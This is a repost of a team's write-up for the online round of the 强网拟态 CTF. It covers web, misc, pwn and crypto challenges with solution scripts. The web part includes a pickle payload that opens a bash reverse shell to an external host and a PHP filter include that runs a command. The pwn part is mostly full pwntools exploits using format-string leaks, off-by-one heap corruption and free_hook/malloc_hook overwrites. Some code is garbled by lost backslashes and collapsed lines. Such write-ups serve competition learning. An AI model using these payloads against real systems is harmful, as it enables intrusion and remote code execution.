2021年11月18日18:08:31评论286 views字数 21026阅读70分5秒阅读模式
强网拟态线上wp
听歌

抖音关注：是二智呀

WEB

zerocalc

根据提示读文件
强网拟态线上wp
ezPickle

先看config.py

notadmin={"admin":"no"}def backdoor(cmd):if notadmin["admin"]=="yes":s=''.join(cmd)eval(s)



首先变量覆盖notadmin
notadmin={"admin":"yes"}
e = pickle.dumps(notadmin,0)
print(e)



得到
b'(dp0nVadminnp1nVyesnp2ns.'



然后调用backdoor反弹shell即可

import sys
import io
import base64
import pickle


'''
notadmin={"admin":"yes"}
s = pickle.dumps(notadmin,0)
print(s)
'''


payload = b"""cconfig
notadmin
(dp0
Vadmin
p1
Vyes
p2
cconfig
backdoor
(S'__import__("os").system("bash -c 'exec bash -i &>/dev/tcp/vps/8001 <&1'")'
tR."""


print(base64.b64encode(payload))





Give_me_your_0day
安装过程，切换安装模式为Mysqli，使用mysql服务端反向读取任意文件




https://github.com/allyshka/Rogue-MySql-Server






查看mysql.log


Jack-Shiro
参考




https://github.com/sqxssss/NPUCTF_WriteUps/blob/master/m0on's-writeup.md





new_hospital
扫描目录发现flag.php和old文件夹
主页面的feature.php会接收id参数并且会被当作参数传入到file_get_contents函数中，同时old/feature.php会同步保存这个参数的值，猜测该值可能存在于cookie中


发现存在键为API的cookie，指为id传入的base64值的编码，所以直接读取flag.php




EasyFilter
利用filter和resource的解析差异bypass ，使其可以进行base64解密然后include执行代码




http://124.70.181.14:32767//?action=w&c=<?php system('cat /flag');?>







http://124.70.181.14:32767/?action=r&r=../convert.base64-decode/.././files/0f9c9f3541



MISC
WeirdPhoto
第一步：
利用crc爆破出宽高
import binascii
import struct


crc32key = 0x9E916964


for i in range(0, 65535):
for j in range(0, 65535):
width = struct.pack('>i', j)
height = struct.pack('>i', i)
data = b'x49x48x44x52' + width + height + b'x08x06x00x00x00'
crc32result = binascii.crc32(data) & 0xffffffff
if crc32result == crc32key:
print(''.join(map(lambda c: "%02X" % c, width)))
print(''.join(map(lambda c: "%02X" % c, height)))



058C，01F4
得到：


右边字符串未知加密，猜测只是进行了字符串顺序的打乱，即使用了栅栏加密
栅栏解密，偏移是4：


使用它解密压缩包，查看out，看出是pdf文件格式，只是缺少了头部，将前面四个00改为：25504446
pdf隐写，使用wbStego,密码还是解压缩包的密码，得到flag：


flag{th1s_ls_thE_f1n4l_F14g_y0u_want}
bar
gif安帧分离 前27张图片有三种颜色 黑白灰 灰色代表空格 黑白分别代表 杠、点 可转换为摩斯电码：
转码脚本：






#coding:utf8import cv2
flag = ''path = 'D:outputoutput_' #不能识别中文路径
for i in range(27,334): #213为gif提取帧后的图片数量213 要和提取出来的图片放在统一文件夹中i=i+1path_name = path+str(i)+'.jpeg'# print(path_name)# exit()img= cv2.imread(path_name)                #获取图片数据img_color = img[-1][-5][0]        #任取一个相同的颜色通道数值 由于相同的颜色 数值相同#自行判断哪个颜色对应的数值后作为下面的判断条件# print(img_color)# exit()#[9 9 9][255 255 255][82 68 56]# print(img_color)                #打印每种颜色的图片 该通道下的数值if img_color == 9 :        #判断数值后 对应为相对应的摩斯编码的符号flag = flag + '-'        #将转换出来的摩斯编码符号连接在一次# flag = flag + '0'        #将转换出来的摩斯编码符号连接在一次if img_color == 82 :flag = flag + ' '# flag = flag + ' 'if img_color == 255 :flag = flag + '.'# flag = flag + '1'
print(flag)                                #输出转换并连接在一起的摩斯编码









后续图片仅有黑白二色 可转换为 黑：1  白：0
根据前面解出的提示：code93  将后续内容绘制为条形码：
#coding:utf8
import cv2


flag = ''
path = 'D:outputoutput_'#不能识别中文路径


for i in range(27,334): #213为gif提取帧后的图片数量213 要和提取出来的图片放在统一文件夹中
i=i+1
path_name = path+str(i)+'.jpeg'
# print(path_name)
# exit()
img= cv2.imread(path_name)                #获取图片数据
img_color = img[-1][-5][0]        #任取一个相同的颜色通道数值 由于相同的颜色 数值相同
#自行判断哪个颜色对应的数值后作为下面的判断条件
# print(img_color)
# exit()#[9 9 9][255 255 255][82 68 56]
# print(img_color)                #打印每种颜色的图片 该通道下的数值
if img_color == 9 :        #判断数值后 对应为相对应的摩斯编码的符号
# flag = flag + '-'        #将转换出来的摩斯编码符号连接在一次
flag = flag + '0'        #将转换出来的摩斯编码符号连接在一次
if img_color == 82 :
# flag = flag + ' '
flag = flag + ' '
if img_color == 255 :
# flag = flag + '.'
flag = flag + '1'


print(flag)                                #输出转换并连接在一起的摩斯编

码

import turtle
from  turtle import *
import time


length = 1600
height = 600
setup(length, height)
# setworldcoordinates(0,0,length,height)


length = 200
wide = 4
init = -700
def chang(offset,colors):
speed(0)
penup()
goto(offset,-50)
pendown()
color(colors,colors)
begin_fill()
turtle.left(90)
turtle.forward(length)
turtle.right(90)
turtle.forward(wide)
turtle.right(90)
turtle.forward(length)
turtle.right(90)
turtle.forward(wide)
turtle.right(90)
turtle.right(90)
end_fill()


# code = '1010111101100010101000101001101000101001000101010001001100101001101001001000010101010100001010000101001000101000100101001010001100101001101001001100101001101010001000100101000010101001000101100010101000010101101000101001001001100010101001000101100101001000010101001000101010001000000000000000000001010111101'#00000000000000000000
code = '101011110110001010100010100110100010100100010101000100110010100110100100100001010101010000101000010100100010100010010100101000110010100110100100110010100110101000100010010100001010100100010110001010100001010110100010100100100110001010100100010110010100100001010100100010101011101'#00000000000000000000
# code = '0101000010011101010111010110010111010110111010101110110011010110010110110111101010101011110101111010110111010111011010110101110011010110010110110011010110010101110111011010111101010110111010011101010111101010010111010110110110011101010110111010011010110111101010110111010101110111111111111111111110101000010'
for i in range(len(code)):
offset = (i+1) * wide
offset = init+offset
if code[i] == '1':
colors = 'black'
else:
colors = 'white'
chang(offset,colors)
# if i == 5:
penup()
goto(-400,-400)
color('white','white')
time.sleep(10)
#         exit()



绘制后图形如下 条形码开头和结尾标志 与生成的code93条形码一致：


无法扫描解码是因为 在空白区 缺少条形码的校验码 C、K码
可以直接通过对照表 把数据区进行解码：
code_list = {'101011110':'','100010100': '0', '101001000': '1', '101000100': '2', '101000010': '3', '100101000': '4', '100100100': '5', '100100010': '6', '101010000': '7', '100010010': '8', '100001010': '9', '111010010': ' ', '111001010': '$', '101101110': '/', '101110110': '+', '110101110': '%', '100101110': '-', '110101000': 'A', '110100100': 'B', '110100010': 'C', '110010100': 'D', '110010010': 'E', '110001010': 'F', '101101000': 'G', '101100100': 'H', '101100010': 'I', '100110100': 'J', '100011010': 'K', '101011000': 'L', '101001100': 'M', '101000110': 'N', '100101100': 'O', '100010110': 'P', '110110100': 'Q', '110110010': 'R', '110101100': 'S', '110100110': 'T', '110010110': 'U', '110011010': 'V', '101101100': 'W', '101100110': 'X', '100110110': 'Y', '100111010': 'Z', '': ''}


# # print(code_list)


# en_code = '101011110110001010100010100110100010100100010101000100110010100110100100100001010101010000101000010100100010100010010100101000110010100110100100110010100110101000100010010100001010100100010110001010100001010110100010100100100110001010100100010110010100100001010100100010101000100'
en_code = '101011110110001010100010100110100010100100010101000100110010100110100100100001010101010000101000010100100010100010010100101000110010100110100100110010100110101000100010010100001010100100010110001010100001010110100010100100100110001010100100010110010100100001010100100010101000100110010110101001100101011110'
# en_code = '101001100'
flag = ''
for i in range(0,len(en_code),9):
strr = ''
for j in range(9):
j += i
strr += en_code[j]
# print(strr)
try:
flag += code_list[strr]
# print(code_list[strr])
except Exception as e:
pass
# print(flag)
#数据区内容为：F0C62DB973684DBDA896F9C5F6D962
#flag = 'F0C62DB973684DBDA896F9C5F6D962W '
# print(len(flag))
# print(len(en_code)%9)
# strr = 'F0C62DB973684DBDA896F9C5F6D962'
print('flag{'+flag.lower()+'}')
#flag：flag{f0c62db973684dbda896f9c5f6d962um}



原字符集为大写，需要找小写字符集的编码
将得到的字符串转码为小写后，使用转码后的字符串生成条形码 再将获取到的ck码添加在字符串后面即可得到完整flag


C码为：U:221121:110010110
K码为：M:111222:101001100
flag{f0c62db973684dbda896f9c5f6d962um}
BlueWhale
分析流量包


得到password.txt内容为th1sIsThEpassw0rD，zip中存在password.txt，考虑使用明文攻击爆破压缩包密码，解开压缩包后获得一张图片，经过尝试，使用zsteg拿到flag


mirror
首先，crc校验，得到正确图片宽高
使用
#-*-coding:utf-8-*-
import binascii
import struct
import sys


# file = input("图片地址：")
fr = open(file,'rb').read()
data = bytearray(fr[0x0c:0x1d])
crc32key = eval('0x'+str(binascii.b2a_hex(fr[0x1d:0x21]))[2:-1])
#原来的代码: crc32key = eval(str(fr[29:33]).replace('//x','').replace("b'",'0x').replace("'",''))
n = 4095
for w in range(n):
    width = bytearray(struct.pack('>i', w))
    for h in range(n):
        height = bytearray(struct.pack('>i', h))
        for x in range(4):
            data[x+4] = width[x]
            data[x+8] = height[x]
        crc32result = binascii.crc32(data) & 0xffffffff
        if crc32result == crc32key:
            print(width,height)
            newpic = bytearray(fr)
            for x in range(4):
                newpic[x+16] = width[x]
                newpic[x+20] = height[x]
            fw = open(file+'.png','wb')
            fw.write(newpic)
            fw.close
            sys.exit()



得到full.png.png


接下来，观察原图下方十六进制数据，发现png标识


搜索找到IEND结束标识，选取开始与结束，把这段数据保存成新的图片
通过观察，发现是进行了十六位数据的逆序，写个翻转脚本得到正确的图片
#-*-coding:utf-8-*-


path=input("you file")
offset=16
f1=open(path+"full_2.png",'rb').read()
#十六位逆序
dec=list(f1)
# dec=f1
res=[]
for i in range(len(dec)-1,16,-1):
    res.append(dec[i])


final="".join(res)


with open(path+"2_s.png",'wb') as f:
    f.write(final)
    f.close()


#前后逆序
f2=open(path+"2_s.png",'rb').read()
dec=f2
res=b''
for i in range(0,len(dec)-1,16):
    res+=dec[i:i+16][::-1]


with open(path+"2.png",'wb') as f:
    f.write(res)
    f.close()



得到的图片同样需要修一下crc的宽高，一样为09220505
然后就是经典双图，盲水印，使用bwmforpy3.py


得到：


依稀可以看到字符串，字符翻转之后查看，然后根据提示所述 2-5 e-6 9-a p-b q-d
得到flag：




flag{356ffd89983749059ab1e3e968a01d90}

PWN
pwnpwn
程序vuln函数中存在栈溢出以及格式化字符串漏洞.


先通过格式化字符串漏洞leak出libc和canary然后再通过栈溢出将返回地址覆盖为onegadget
exp
#coding:utf8
from pwn import *
context.log_level="debug"
p=process("./pwnpwn")
p = remote("124.71.156.217",49153)
elf=ELF("./pwnpwn")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p.recvuntil("welcome to mimic world,try somethingn")
p.sendline("2")
p.recvuntil("hellon")
p.sendline("aaaaaaaa%29$p##%21$p")
p.recvuntil("0x")
libc_base=int(p.recv(12),16)
print "libc_base : "+hex(libc_base)
libc_base=libc_base-240-libc.sym['__libc_start_main']
print "libc_base : "+hex(libc_base)
p.recvuntil("##0x")
canary=int(p.recv(16),16)
print "canary : "+hex(canary)
one=libc_base+0x45226
print "one : "+hex(libc_base+0xe6c7e)
p.sendline("2")
pd="a"*(0x70-0x8+1)+p64(canary)+p64(0xdeadbeef)+p64(one)
p.sendline(pd)
raw_input()
p.sendline("ls")
p.sendline("ls")
p.sendline("cat flag")


p.interactive()



old_school
思路
该程序保护全开的64程序，libc为2.27-3ubuntu1.4_amd64.Tcache堆机制.
经典菜单题，这题的漏洞点是edit函数中存在off by one漏洞.


伪造堆块 将large chunk放入unsigned bin中leak libc
伪造堆块 fastbin攻击，将malloc_hook中内容改为onegadget
最后执行malloc函数即可getshell
exp
#coding:utf8
from pwn import *
context.log_level="debug"
p=process("./old_school")
p=remote("121.36.194.21",49153)
elf=ELF("./old_school")
libc=ELF("./libc-2.27.so")




def add(index,size):
p.sendlineafter("Your choice: ","1")
p.sendlineafter("Index: ",str(index))
p.sendlineafter("Size: ",str(size))




def edit(index,content):
p.sendlineafter("Your choice: ","2")
p.sendlineafter("Index: ",str(index))
p.sendlineafter("Content: ",content)








def delete(index):
p.sendlineafter("Your choice: ","4")
p.sendlineafter("Index: ",str(index))




def show(index):
p.sendlineafter("Your choice: ","3")
p.sendlineafter("Index: ",str(index))
#.bss:0000000000202160 ; _QWORD qword_202160[32]
#all chunk<=0x20




add(0,0x18)
for i in range(0x18):
add(i+1,0x38)




edit(0,"a"*0x18+p8(0x81))
delete(1)
add(1,0x78)
edit(1,p64(0)*7+p64(0x481))
delete(2)
edit(1,"a"*0x40)
#gdb.attach(p)
show(1)
p.recvuntil("a"*0x40+"n")
temp="xa0"+p.recv(5)
libc_base=u64(temp.ljust(8,"x00"))-(0x7ffff7dcdca0-0x7ffff79e2000)
print hex(libc_base)
__malloc_hook=libc_base+libc.symbols['__malloc_hook']
print hex(__malloc_hook)




edit(3,"a"*0x38+p8(0x71))
delete(4)
add(4,0x68)
edit(4,p64(0)*7+p64(0x71))
delete(5)
edit(4,p64(0)*7+p64(0x71)+p64(libc_base+libc.symbols['__malloc_hook']-0x23))
add(0x5,0x68)
add(0x1a,0x68)
edit(26,"a"*(0x23)+p64(libc_base+0x10a41c))#4
show(26)
'''
0x4f3d5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL




0x4f432 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL




0x10a41c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL




'''
add(0x1b,0x38)




p.interactive()





bitflip
思路
这题和上一题漏洞是一模一样的。
经典菜单题，这题的漏洞点是edit函数中存在off by one漏洞.


那就换一种拿shell的方式，
伪造堆块 将large chunk放入unsigned bin中leak libc
伪造堆块 fastbin攻击，改__free_hook内容为system函数，最后输入参数,free("$0")即可拿到shell.
exp
from pwn import *
context.log_level="debug"
p = process('./bitflip')
p=remote("124.71.130.185",49153)
libc = ELF('./libc-2.27.so')


def add(index,size):
p.sendlineafter('Your choice: ','1')
p.sendlineafter('Index: ',str(index))
p.sendlineafter('Size: ',str(size))


def edit(index,content):
p.sendlineafter('Your choice: ','2')
p.sendlineafter('Index: ',str(index))
p.sendafter('Content: ',content)


def free(index):
p.sendlineafter('Your choice: ','4')
p.sendlineafter('Index: ',str(index))


def show(index):
p.sendlineafter('Your choice: ','3')
p.sendlineafter('Index: ',str(index))


add(0,0x18)
add(1,0x18)
for i in range(0x11):
add(i+2,0x50)


edit(0,'x51'*0x19)


free(1)
add(1,0x40)
edit(1,p64(0)*3+p64(0x481)+'n')
free(2)




add(0x1f,0x20)
show(0x1f)
temp = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00'))
print hex(temp)




libc_base = temp - 0x3ec0b0
print hex(libc_base)


edit(1,p64(0)*3+p64(0x61)+'n')
free(10)
free(0x1f)
edit(1,p64(0)*3+p64(0x61)+p64(libc_base+libc.sym['__free_hook'])*3+p64(0x61)+'n')




add(0x1d,0x50)
add(0x1c,0x50)
edit(0x1c,p64(libc_base+libc.sym['system'])+'n')
edit(0x1d,'$0x00n')
free(0x1d)


p.interactive()





sonic
存在栈溢出漏洞


存在命令行调用那个函数


连接远程 返回固定的main地址


可知远程没有开pie，直接通过栈溢出调用noAuthLogin()
from pwn import *
p=remote("123.60.63.90",6889)
addr=0x55555555473a
pd=b"a"*40+p64(addr)


p.sendline(pd)
p.interactive()



可以发现 直接返回flag


old_school_revenge
依然还是offbyone漏洞
创建一个0xf8（0x100）的bin，进行offbynull，leak libc
伪造堆块 改__free_hook内容为system函数，最后输入参数,free("/bin/shx00")即可拿到shell.
具体exp如下






from pwn import *context.log_level="debug"p = process('./old_school_revenge')elf=ELF("./old_school_revenge")p = remote('123.60.63.39', 49153)libc = ELF('./libc-2.27.so')
def add(idx,size):p.sendlineafter('Your choice: ','1')p.sendlineafter('Index: ',str(idx))p.sendlineafter('Size: ',str(size))
def edit(idx,content):p.sendlineafter('Your choice: ','2')p.sendlineafter('Index: ',str(idx))p.sendafter('Content: ',content)
def delete(idx):p.sendlineafter('Your choice: ','4')p.sendlineafter('Index: ',str(idx))
def show(idx):p.sendlineafter('Your choice: ','3')p.sendlineafter('Index: ',str(idx))
for i in range(11):add(i,0xf8)for i in range(8):delete(i)edit(8,'a'*0xf0+p64(0x200))delete(9)for i in range(8):add(i,0xf8)show(8)temp= u64(p.recvuntil('x7f')[-6:].ljust(8,'x00'))libc_base = temp-0x3ebca0

print hex(libc_base)__malloc_hook=libc_base+libc.symbols['__malloc_hook']print hex(__malloc_hook)
add(15,0xf8)delete(15)edit(8,p64(libc_base+libc.sym['__free_hook']-8)+'n')add(14,0xf8)add(13,0xf8)edit(13,'/bin/shx00'+p64(libc_base+libc.sym['system'])+'n')edit(14,'/bin/shx00'+p64(libc_base+libc.sym['system'])+'n')delete(13)p.sendline("cat flag")
p.interactive()




oldecho
思路：
非栈上格式化字符串，close(1),禁止exevce.
2020cicsn决赛的基本上是原题
参考链接：




http://cn-sec.com/archives/167378.html


对着链接魔改下即可.
成功的可能性很小，看运气了.
exp如下：
from pwn import *


libc = ELF('./libc.so.6')
stop = False
while not stop:
try:




# p = process('./oldecho_c1')
p = remote('123.60.32.152', '49153')
p.recvuntil('Gift:')
leak_stack = int(p.recvline().strip(), 16)
print(hex(leak_stack))
p.recv()
#
target = (leak_stack+0x18) & 0xff


def write_ptr(addr):
for i in range(8):
p1 = '%{}c%6$hhn'
x1 = (target+i) % 256
if x1 == 0:
p.sendline(p1.format(256))
else:
p.sendline(p1.format(x1))
p2 = '%{}c%10$hhn'
x = ord(p64(addr)[i])
if x == 0:
x = 256
p.sendline(p2.format(x))




def write(addr, v, cnt):




# write addr to stack
for i in range(cnt):
write_ptr(addr+i)
p3 = '%{}c%12$hhn'
x = (ord(p64(v)[i])+256) % 256
if x == 0:
x = 256


p.sendline(p3.format(x))


info('write {} on {}'.format(hex(x), hex(addr+i)))


write(leak_stack+0x198+0x80, 0xb14690, 3)
payload = 'aa%76$hhn'
p.sendline(payload)
p.sendline('opend?')


if 'open' not in p.recvuntil('opend?', timeout=2):
p.close()
continue
p.sendline('%76$p')
libc_leak = int(p.recv(), 16)
payload = '%256c%76$hhn'
p.sendline(payload)


info(hex(libc_leak))
libcbase = libc_leak-0x3c5690




libc.address = libcbase
payload = [
libcbase+ 0x0000000000021112,
libcbase+0x0000000000021112+,
libcbase+ 0x0000000000021112,
leak_stack+0xa8,
libcbase+0x00000000000202f8,
0,
libc.sym['open'],
libcbase+0x0000000000021112+,
1,
libcbase+0x00000000000202f8+,
libc.sym['__free_hook'],
libcbase+0x0000000000001b92+,
0x100,
libc.sym['read'],
libcbase+0x0000000000021112+,
2,
libcbase+0x00000000000202f8,
libc.sym['__free_hook'],
libc.sym['write'],
u64('/flag'.ljust(8,'x00'))
]
idx = 0
for x in payload:
write(leak_stack+0x10+idx*8, x, 8)
idx += 1


p.sendline('Bye~')
p.interactive()
stop = True
except Exception as e:
print(e)
p.close()





random_heap
程序含有doublefree漏洞，size是一定程度是random的，这里我们我们选择去爆，第一次爆overlap，第二次爆去修改freehook为system.
import ctypes
from pwn import *
lib = ctypes.CDLL('./libc-2.27.so')
p = process('./random_heap')
p = remote('124.71.140.198' ,'49153')
lib = ELF('./libc-2.27.so')
lib.srand(lib.time(0))
randlist = []
real_size = []
ii = 0




def add(idx,size):


x = size+(lib.rand()&0xf)*0x10
p.sendlineafter('Your choice: ','1')
p.sendlineafter('Index: ',str(idx))
p.sendlineafter('Size: ',str(size))
print(hex(x))
return x
def edit(idx,content):
p.sendlineafter('Your choice: ','2')
p.sendlineafter('Index: ',str(idx))
p.sendafter('Content: ',content)


def free(idx):
p.sendlineafter('Your choice: ','4')
p.sendlineafter('Index: ',str(idx))


def show(idx):
p.sendlineafter('Your choice: ','3')
p.sendlineafter('Index: ',str(idx))








def add_extract(idx,size):
if size > 0x100:
exit(0)
x = lib.rand()
while  x& 0xf !=0:
p.sendlineafter('Your choice: ','1')
p.sendlineafter('Index: ',str(0x3f))
p.sendlineafter('Size: ',str(0))
print(hex(x&0xf*0x10))
x = lib.rand()




p.sendlineafter('Your choice: ','1')
p.sendlineafter('Index: ',str(idx))
p.sendlineafter('Size: ',str(size))
print(hex(size))






def make_double():
pass




make_double()


real = add(0,0x80)
if(real>0x100):
exit(0)
free(0)
edit(0,'a'*0x10+'n')
free(0)
edit(0,'a'*0x10+'n')
free(0)
edit(0,'a'*0x10+'n')
free(0)
show(0)
p.recvuntil('Content: ')
print hex(real)
x0 = u64(p.recvn(6).ljust(8,'x00'))
print hex(x0)
heap_base = x0 & (~0xfff)
print hex(heap_base)








add(1,0x100)
add(2,0x100)
add(3,0x100)
add(4,0x100)
add(5,0x10)
edit(0,p64(x0+real)+'n')
edit(1,'b'*0x10)
succ  = False
for i in range(0x40-5):
add(6+i,real)
edit(6+i,'a'*0x10)
show(6+i)
p.recvuntil('Content: ')
x = p.recvline()
print(x)
if 'b'*0x10 in x:
succ = True
break
print(i)
if not succ:
exit(0)
free(5)
edit(5,p64(0)*2)
free(5)
show(5)
p.recvuntil('Content: ')
x5 = u64(p.recvn(6).ljust(8,'x00'))
print('x5 '+hex(x5))
size = x5-0x10-x0-real
print(hex(size))
edit(6+i,p64(0)+p64(size+1))
free(1)
show(1)
leak = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00'))
print(hex(leak))
libc = ELF('./libc-2.27.so')
libc.address = leak - 0x3ebca0
free(0)
edit(0,'a'*0x10+'n')
free(0)
edit(0,'a'*0x10+'n')
free(0)
edit(0,'a'*0x10+'n')
free(0)
edit(0,p64(libc.sym['__free_hook']-8))
for i in range(0x40):
add(i,0x80)
edit(i,'cat fl*;'+p64(libc.sym['system']))


for i in range(0x40):
free(i)
p.interactive()



boringnote
伪造堆块重用，将large chunk放入unsigned bin中进而leak libc
Leak 堆地址进而构造Fastbin attack 攻击将free_hook内容改为system，发送参数，执行free("$0")即可getshell.
from pwn import *
p = process('./bornote')
p = remote('121.36.250.162',49153)
libc = ELF('./libc-2.31.so')


p.recvuntil("username")
p.sendline("aaa")


def add(size):
p.sendlineafter('cmd', '1')
p.sendlineafter('Size: ', str(size))




def delete(idx):
p.sendlineafter('cmd', '2')
p.sendlineafter('Index: ', str(idx))




def edit(idx, content):
p.sendlineafter('cmd', '3')
p.sendlineafter('Index: ', str(idx))
p.sendafter('Note', content)




def show(idx):
p.sendlineafter('cmd', '4')
p.sendlineafter('Index: ', str(idx))


add(0x30)
add(0x30)
add(0x4f0)
add(0x10)
delete(2)
add(0x4f0)
show(2)
leak = u64(p.recvuntil('x7f')[-6:].ljust(8, 'x00'))
libc_base = leak-0x1ebbe0
print hex(libc_base)7
delete(1)
delete(0)
add(0x37)
show(0)
p.recvuntil('Note: ')
heap_leak = u64(p.recvn(6).ljust(8, 'x00'))
print hex(heap_leak)
add(0x38)


edit(0,p64(0)+p64(0x71)+p64(heap_leak)+p64(heap_leak)+'n')
edit(1,p64(0)+p64(0x71)+p64(heap_leak-0x40)+p64(heap_leak-0x40)+p64(0)*2+p64(0x70)+'n')


delete(2)
add(0x20)
add(0x30)
add(0x30)
delete(5)
delete(1)
edit(4,p64(libc_base+libc.sym['__free_hook'])+'n')


add(0x30)
add(0x30)
edit(4,'$0x00n')
edit(5,p64(libc_base+libc.sym['system'])+'n')


delete(4)


p.interactive()



CRYPTO
onlyrsa
n比较大，无法直接分解，题目描述说RSA 11，应该说的是n为十一进制，就是在尝试对n进行分解时，需要转n为11进制进行多项式分解，之后得到pq解rsa即可。






from sympy.ntheory.factor_ import digitsfrom sympy import *
i=11a=sum(a*i^b for b,a in enumerate(digits(n,11)))#将n变成11进制并分解成多项式#在分解的多项式里遍历找出p*q=n的值(p,_),(q,_)=a.factor_list()p=int(p,11)#还原十一进制为十进制q=int(q,11)if p*q==n:print(p)
分解得到p=16249579302136675275737472669394168521026727339712083110552530420348131906271518040549529167354613121510156841352658645018277766962773342379074137176993546193979134201416444089373463960664685121485689105129185197998903479181913613273443541075619342246119648308939006396145123630152777688592984718084919469059
之后跑一下rsa即可：#!/usr/bin/env python# from Crypto.Util.number import *from Crypto.Util.number import *import gmpy2import libnum

c=76196483810925191371357319946893762223027002702624516192769497540954799651198719100683206759706879828894501526423422596543748404479640715319801018211652987852179907519286760601944889601355220646374788026632971331786307898234821477134265724962397355614076896148563340833323366935479885600112872998594315513803419069126624158092821269145991266528158747750965226483644012365861166608598063649804899693010576080857540523307078138634628539419178875838147396170651777949577793359622498517581948006585916952705460782942977789615065947303447566918741750017127110484065354974088489869377128636357092420660532261674969708694n=264048827496427248021277383801027180195275776366915828865010362454006394906519399441496561006668252031429735502465174250525698696973129422193405161920872162928097673289330345041221985548078586423910246601720647996170161319016119241836415788315729493164331517547663558380515400720081995290120793014108439083514403659082115510258023834737471488528527557960636984676435543300074504679264476413252780514962473070445293528877641502742438571110744667739728450283295649865745629276142949963507003094791773183928894536793857609738113546410753895719242547720815692998871947957214118354127328586542848234994500987288641595105e=65537p=16249579302136675275737472669394168521026727339712083110552530420348131906271518040549529167354613121510156841352658645018277766962773342379074137176993546193979134201416444089373463960664685121485689105129185197998903479181913613273443541075619342246119648308939006396145123630152777688592984718084919469059
d=gmpy2.invert(e, p-1)# d = 869295589259367739089912250772784149941555244412020131919330632371645794946182190978632669495785184003152568561002505598884322611219362167646275004082264567436575438457147153170626739797219677982343195486258499842595108076533700476626837588097127026182087782033662761873213657129799023089354172781874783077m=pow(c,d,p)print(long_to_bytes(m))


#flag{5c066086-178b-46a7-b0f8-f1afba6f2910}




flag{5c066086-178b-46a7-b0f8-f1afba6f2910}
签到题
base64解密

相关推荐: ByteCTF web sp-oauth 题解

更多全球网络安全资讯尽在邑安全ByteCTF唯一一道0解题目，比赛的时候卡住了，最后磕磕绊绊的做了一下这个题目主要考察对Spring-oauth的理解，可惜我对Spring-oauth一无所知:)题目分为两个端口http://39.105.175.150:30…
左青龙
微信扫一扫
右白虎
微信扫一扫
强网拟态线上wp

听歌

抖音关注：是二智呀

WEB

zerocalc

ezPickle

Give_me_your_0day

Jack-Shiro

new_hospital

EasyFilter

MISC

WeirdPhoto

bar

BlueWhale

mirror

PWN

pwnpwn

old_school

bitflip

sonic

old_school_revenge

oldecho

random_heap

boringnote

CRYPTO

onlyrsa

签到题

原创 | GDA CTF应用方向：牛刀小试ONE

第二届华为杯 WP

看雪2023 KCTF年度赛 | 第12题·深入内核-设计思路及解析

『CTF』堆入门（三）

腾讯游戏安全大赛2024决赛题解

首届“数信杯”数据安全大赛-西部赛区 WP

看雪2023 KCTF年度赛 | 第13题·共存之道-设计思路及解析

第一届龙信杯电子数据取证竞赛Writeup

新手向-从VNCTF2024的一道题学习QEMU Escape

Batman Investigation III - Th3 Sw0rd 0f Azr43l - bi0sCTF 2024

发表评论

在线咨询

微信

听歌 抖音关注：是二智呀

WEB

zerocalc

ezPickle

Give_me_your_0day

Jack-Shiro

new_hospital

EasyFilter

MISC

WeirdPhoto

bar

BlueWhale

mirror

PWN

pwnpwn

old_school

bitflip

sonic

old_school_revenge

oldecho

random_heap

boringnote

CRYPTO

onlyrsa

签到题

发表评论

在线咨询

微信

听歌

抖音关注：是二智呀
